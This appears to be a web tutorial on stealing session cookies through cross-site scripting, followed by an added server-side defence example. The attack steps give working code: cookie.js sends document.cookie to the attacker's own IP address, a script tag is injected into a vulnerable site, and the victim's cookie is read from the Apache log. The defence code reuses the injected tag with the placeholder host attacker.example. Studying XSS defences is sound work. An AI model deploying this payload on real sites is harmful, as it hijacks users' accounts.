Steal victim’s cookie using Cross Site Scripting (XSS)

XSS (cross-site scripting) is a vulnerability that allows an attacker to insert malicious code (JavaScript) into a website script. Once a script has been found to be vulnerable, the attacker can e-mail or post a link to that website script to attack a user’s computer.

What can a hacker do with cross-site scripting?

  • Execute JavaScript code.
  • Access cookies stored on a computer to gain access to the victim’s account.
  • Create fake login pages that steal login details.
  • Access webcams and microphones connected to a computer.
  • Bypass website security designed to protect you and your computer.
  • Create a script that loops or causes other problems that cause the browser to crash.
  • Help other computers perform a DDoS attack on another server.
  • Give the appearance of the site being defaced.
  • Help distribute spam, transfer money, or perform other actions on a user’s account.

How users can reduce the risk of becoming a victim of cross-site scripting

  • Always be cautious with links sent by e-mail and posted on social networks.
  • Never click on a link purporting to be from any financial service or other sensitive site. If your bank, credit card, or related service wants you to click on a link, open your browser and enter the web address in the address bar instead.
  • Familiarize yourself with phishing tactics.
  • When you are done with your online account, log out.
  • Keep your browser up-to-date with the latest version.

Steal victim’s cookie using Cross Site Scripting (XSS)

  1. Create a cookie.js file:
    var img = document.createElement("img");
    img.src = "http://youripaddress/ddos?" + escape(document.cookie);
  2. Put cookie.js on your web server.
  3. Insert a script tag into a vulnerable website:
    <script src="http://youripaddress/cookie.js"></script>
  4. If your victim visits the link that you sent, you will get your victim’s cookie. You can view the Apache access log with sudo leafpad /var/log/apache2/access.log
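
Each step above depends on something the vulnerable site allows: the script tag is rendered as markup, cookie.js loads from another host, document.cookie exposes the session cookie, and the image request to another host is permitted. The following is an added example, not part of the original post, showing the server-side settings that close each of those; the function names, the cookie name sid and the host attacker.example are hypothetical.

```javascript
// Added example: server-side defences against the cookie.js steps above.
// escapeHtml, sessionCookie, securityHeaders and renderComment are hypothetical names.

// 1. Output encoding: user input is rendered as text, so an injected
//    <script src=...> tag never becomes a script element.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// 2. HttpOnly keeps the session cookie out of document.cookie, so the
//    img.src request would have no session value to carry.
function sessionCookie(sessionId) {
  return `sid=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// 3. Content-Security-Policy: scripts and images only from the site's own
//    origin. This blocks loading cookie.js from another host and blocks the
//    image request to another host that carries the data out.
function securityHeaders(sessionId) {
  return {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; img-src 'self'; object-src 'none'; base-uri 'none'",
    "Set-Cookie": sessionCookie(sessionId),
  };
}

// Build the response for a page that echoes a user-supplied comment.
function renderComment(comment, sessionId) {
  return {
    headers: securityHeaders(sessionId),
    body: `<!doctype html><html><body><p>${escapeHtml(comment)}</p></body></html>`,
  };
}

// Constructed sample input: the script tag from step 3 with a placeholder host.
const sample = '<script src="http://attacker.example/cookie.js"></script>';
const page = renderComment(sample, "constructed-session-id");
console.log(page.headers["Set-Cookie"]);
console.log(page.body);
```

HttpOnly protects only the cookie value; a script that still runs can act inside the page as the user, which is why the output encoding and the policy header are applied together with it.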